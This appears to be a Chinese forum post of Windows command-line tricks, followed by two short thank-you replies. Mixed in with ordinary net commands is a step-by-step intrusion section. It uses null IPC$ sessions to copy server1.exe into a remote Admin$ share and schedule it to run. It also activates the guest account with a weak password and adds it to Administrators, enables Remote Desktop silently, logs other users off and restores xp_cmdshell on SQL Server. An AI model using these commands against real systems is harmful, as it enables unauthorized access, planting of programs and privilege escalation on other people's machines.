net share abc$=c:\
将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)

net share c$ /del
禁止C$共享

net use z: \\*.*.*.*\C$
把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z：盘

net use c: /del
删除映射的c盘

net use * /del /y
删除全部

net start
显示本地主机当前服务

net start telnet
启动 Telnet 服务

net start Server
启动 Server 服务 (IPC$ 和共享要*这个服务)

net stop Messenger
停止信使服务(不会在有烦人的Win的弹出广告了)!

net stop server
停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)

net user
得到本地主机的用户列表

net user guest /active:yes
将停用的guest帐号激活(变为可用)

net user guest 888888
把 Guest 帐号的密码改为 888888

net localgroup Administrators guest /add
把 Guest 加到Administrators组中(这样你就有了超级权限了)

net view \\*.*.*.*
查看指定IP主机上的共享

nbtstat -A *.*.*.*
得到远程主机的NetBIOS用户名列表

net share
查看本地主机的共享资源(本地的默认共享也可以看到)

net use \\*.*.*.*\ipc$ "" /user:""
建立空连接

telnet *.*.*.* 90
连接对方机子的telnet,端口为90

ipconfig
查看本机的IP信息

入侵ipc过程序命令
--------------------------------------------------------
net use \\*.*.*.*\ipc$ "" /user:"Administrator"
建立用户名为 Administrator 密码为空的连接

copy server1.exe \\*.*.*.*\Admin$\system32
即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内

net time \\*.*.*.*
查看远程主机的当前时间

at \\*.*.*.* 14:00 server1.exe
在对方机子添加一个在 14:00 运行 server1.exe 的任务
-------------------------------------------------------

3389 DOS开启
-------------------------------------------------------
echo [Components] > c:\sql

echo TSEnable = on >> c:\sql

sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

---------
C:\>dir c:\sysoc.inf /s
检查INF文件的位置

C:\> dir c:\sysocmgr.* /s
检查组件安装程序

-------------------------------------------------------
query user
查看正在使用的用户

logoff user
踢掉正在使用帐号的ID（这里的ID不是你的帐号）

-------------------------------------------------------
删除Radmin服务

r_server.exe /stop

r_server /uninstall /silence

-------------------------------------------------------
开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"

Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

学习了。谢谢

恩 不错 学习